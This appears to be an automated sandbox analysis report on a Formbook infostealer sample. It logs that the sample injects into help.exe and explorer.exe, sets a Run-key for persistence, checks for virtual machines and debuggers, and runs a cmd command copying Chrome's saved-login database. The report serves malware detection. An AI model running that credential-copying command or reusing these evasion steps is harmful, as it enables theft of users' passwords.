        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058AC53F0_2_058AC53F
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05800D400_2_05800D40
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D1C9F0_2_058D1C9F
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D2C9A0_2_058D2C9A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C34900_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058CDCC50_2_058CDCC5
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0581740C0_2_0581740C
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058214100_2_05821410
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058BF42B0_2_058BF42B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583547E0_2_0583547E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C27820_2_058C2782
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058257900_2_05825790
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D1FCE0_2_058D1FCE
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058067D00_2_058067D0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D17460_2_058D1746
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3E960_2_058C3E96
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D26F80_2_058D26F8
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058366110_2_05836611
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058276400_2_05827640
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05834E610_2_05834E61
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058CCE660_2_058CCE66
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05835E700_2_05835E70
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058361800_2_05836180
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058DD9BE0_2_058DD9BE
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C61DF0_2_058C61DF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D19E20_2_058D19E2
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058599060_2_05859906
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058291100_2_05829110
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058371100_2_05837110
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583594B0_2_0583594B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0581A0800_2_0581A080
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058B18B60_2_058B18B6
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058348CB0_2_058348CB
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D28E80_2_058D28E8
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058398100_2_05839810
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058CD0160_2_058CD016
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058300210_2_05830021
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583E0200_2_0583E020
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058310700_2_05831070
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05834B960_2_05834B96
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058363C20_2_058363C2
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0580EBE00_2_0580EBE0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05828B000_2_05828B00
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0582FB400_2_0582FB40
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D1A990_2_058D1A99
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058242B00_2_058242B0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D22DD0_2_058D22DD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C0A020_2_058C0A02
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058DE2140_2_058DE214
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583523D0_2_0583523D
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05834A5B0_2_05834A5B
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03218B004_2_03218B00
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0321FB404_2_0321FB40
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03224B964_2_03224B96
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032263C24_2_032263C2
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_031FEBE04_2_031FEBE0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0322523D4_2_0322523D
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B0A024_2_032B0A02
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032CE2144_2_032CE214
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03224A5B4_2_03224A5B
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032142B04_2_032142B0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C1A994_2_032C1A99
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C22DD4_2_032C22DD
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032499064_2_03249906
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032191104_2_03219110
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032271104_2_03227110
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0322594B4_2_0322594B
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032CD9BE4_2_032CD9BE
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032261804_2_03226180
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C19E24_2_032C19E2
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B61DF4_2_032B61DF
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0322E0204_2_0322E020
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032200214_2_03220021
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032298104_2_03229810
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032BD0164_2_032BD016
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0327A8604_2_0327A860
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032210704_2_03221070
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032A18B64_2_032A18B6
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0320A0804_2_0320A080
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C28E84_2_032C28E8
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032248CB4_2_032248CB
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032187404_2_03218740
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C17464_2_032C1746
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B27824_2_032B2782
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032157904_2_03215790
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_031F67D04_2_031F67D0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C1FCE4_2_032C1FCE
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032266114_2_03226611
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03224E614_2_03224E61
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032BCE664_2_032BCE66
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_03225E704_2_03225E70
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032176404_2_03217640
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B3E964_2_032B3E96
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C26F84_2_032C26F8
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032115304_2_03211530
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0329C53F4_2_0329C53F
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B1D1B4_2_032B1D1B
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C25194_2_032C2519
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_031F0D404_2_031F0D40
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0329E58A4_2_0329E58A
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032BE5814_2_032BE581
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032A1DE34_2_032A1DE3
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032AFDDB4_2_032AFDDB
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032BD5D24_2_032BD5D2
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032AF42B4_2_032AF42B
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0320740C4_2_0320740C
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032114104_2_03211410
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0322547E4_2_0322547E
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C1C9F4_2_032C1C9F
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032C2C9A4_2_032C2C9A
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B34904_2_032B3490
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032B44EF4_2_032B44EF
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_032BDCC54_2_032BDCC5
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1D83F4_2_00A1D83F
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1C9C94_2_00A1C9C9
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1DAAC4_2_00A1DAAC
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1CA104_2_00A1CA10
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A02D904_2_00A02D90
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1CD474_2_00A1CD47
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1C7A34_2_00A1C7A3
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A02FB04_2_00A02FB0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A09F604_2_00A09F60
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A09F5C4_2_00A09F5C
        Source: C:\Users\user\Desktop\order SEC.exeCode function: String function: 05895110 appears 64 times
        Source: C:\Users\user\Desktop\order SEC.exeCode function: String function: 0580B0E0 appears 176 times
        Source: C:\Users\user\Desktop\order SEC.exeCode function: String function: 0585DDE8 appears 50 times
        Source: C:\Windows\SysWOW64\help.exeCode function: String function: 031FB0E0 appears 176 times
        Source: C:\Windows\SysWOW64\help.exeCode function: String function: 03285110 appears 78 times
        Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0324DDE8 appears 50 times
        Source: order SEC.exe, 00000000.00000002.941067970.0000000005A8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs order SEC.exe
        Source: order SEC.exe, 00000000.00000002.937569939.00000000030E0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs order SEC.exe
        Source: C:\Windows\SysWOW64\help.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
        Source: 00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.1176368416.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.1176368416.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.937366174.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.937366174.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.936678978.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.936678978.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.1175496790.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.1175496790.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0.2.order SEC.exe.1150000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0.2.order SEC.exe.1150000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/6@2/1
        Source: C:\Windows\SysWOW64\help.exeFile created: C:\Users\user\AppData\Roaming\O2LBPCVFJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_01
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\DB1Jump to behavior
        Source: C:\Users\user\Desktop\order SEC.exeCommand line argument: ShowDib10_2_011512C0
        Source: C:\Users\user\Desktop\order SEC.exeCommand line argument: ShowDib10_2_011512C0
        Source: C:\Users\user\Desktop\order SEC.exeCommand line argument: ShowDib10_2_011512C0
        Source: C:\Users\user\Desktop\order SEC.exeCommand line argument: ShowDib10_2_011512C0
        Source: C:\Users\user\Desktop\order SEC.exeCommand line argument: ShowDib10_2_011512C0
        Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\order SEC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\help.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: order SEC.exeVirustotal: Detection: 31%
        Source: order SEC.exeMetadefender: Detection: 18%
        Source: order SEC.exeReversingLabs: Detection: 50%
        Source: unknownProcess created: C:\Users\user\Desktop\order SEC.exe 'C:\Users\user\Desktop\order SEC.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\order SEC.exe'
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\order SEC.exe'Jump to behavior
        Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6db7cd52-e3b7-4ecc-bb1f-388aeef6bb50}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\help.exeFile written: C:\Users\user\AppData\Roaming\O2LBPCVF\O2Llogri.iniJump to behavior
        Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: order SEC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: order SEC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: order SEC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: order SEC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: order SEC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: order SEC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: order SEC.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: order SEC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.884724922.0000000007010000.00000002.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: order SEC.exe, 00000000.00000002.939630418.00000000057E0000.00000040.00000001.sdmp, help.exe, 00000004.00000002.1176829022.00000000032EF000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: order SEC.exe, help.exe
        Source: Binary string: help.pdbGCTL source: order SEC.exe, 00000000.00000002.937569939.00000000030E0000.00000040.00000001.sdmp
        Source: Binary string: help.pdb source: order SEC.exe, 00000000.00000002.937569939.00000000030E0000.00000040.00000001.sdmp
        Source: Binary string: C:\Codes\Version11\SHOWDIB1\Release\SHOWDIB1.pdb source: order SEC.exe
        Source: Binary string: C:\Codes\Version11\SHOWDIB1\Release\SHOWDIB1.pdbyy source: order SEC.exe
        Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.884724922.0000000007010000.00000002.00000001.sdmp
        Source: order SEC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: order SEC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: order SEC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: order SEC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: order SEC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0115454A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0115454A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0116A1F3 push C221422Eh; ret 0_2_0116A1FA
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_011530D5 push ecx; ret 0_2_011530E8
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_011738F1 push cs; retf 0_2_011738F2
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0117855C push eax; ret 0_2_01178562
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_011784A5 push eax; ret 0_2_011784F8
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_011784F2 push eax; ret 0_2_011784F8
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_011784FB push eax; ret 0_2_01178562
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_01189776 pushad ; ret 0_2_01189777
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0585DE2D push ecx; ret 0_2_0585DE40
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0324DE2D push ecx; ret 4_2_0324DE40
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A17B01 push cs; retf 4_2_00A17B02
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A0E403 push C221422Eh; ret 4_2_00A0E40A
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1C6B5 push eax; ret 4_2_00A1C708
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1C702 push eax; ret 4_2_00A1C708
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1C70B push eax; ret 4_2_00A1C772
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1C76C push eax; ret 4_2_00A1C772
        Source: initial sampleStatic PE information: section name: .data entropy: 7.91464332979

        Source: C:\Windows\SysWOW64\help.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CRTT0Z9P0LHJump to behavior
        Source: C:\Windows\SysWOW64\help.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CRTT0Z9P0LHJump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Modifies the prolog of user mode functions (user mode inline hooks)Show sources
        Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xA3 0x35
        Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Users\user\Desktop\order SEC.exeRDTSC instruction interceptor: First address: 00000000011656A4 second address: 00000000011656AA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\order SEC.exeRDTSC instruction interceptor: First address: 000000000116590E second address: 0000000001165914 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000000A098B4 second address: 0000000000A098BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000000A09B1E second address: 0000000000A09B24 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_01165840 rdtsc 0_2_01165840
        Source: C:\Users\user\Desktop\order SEC.exeAPI coverage: 6.3 %
        Source: C:\Windows\SysWOW64\help.exeAPI coverage: 4.8 %
        Source: C:\Windows\explorer.exe TID: 4772Thread sleep time: -42000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\help.exe TID: 4212Thread sleep time: -35000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: explorer.exe, 00000003.00000000.885398797.0000000007340000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: explorer.exe, 00000003.00000000.885398797.0000000007340000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: explorer.exe, 00000003.00000000.885398797.0000000007340000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: help.exe, 00000004.00000002.1175214039.0000000000DC2000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: explorer.exe, 00000003.00000000.885398797.0000000007340000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\order SEC.exeAPI call chain: ExitProcess graph end nodegraph_0-50169
        Source: C:\Users\user\Desktop\order SEC.exeProcess information queried: ProcessInformationJump to behavior

        Source: C:\Users\user\Desktop\order SEC.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_01165840 rdtsc 0_2_01165840
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A5F0 NtReadVirtualMemory,LdrInitializeThunk,0_2_0584A5F0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_01151A41 IsDebuggerPresent,0_2_01151A41
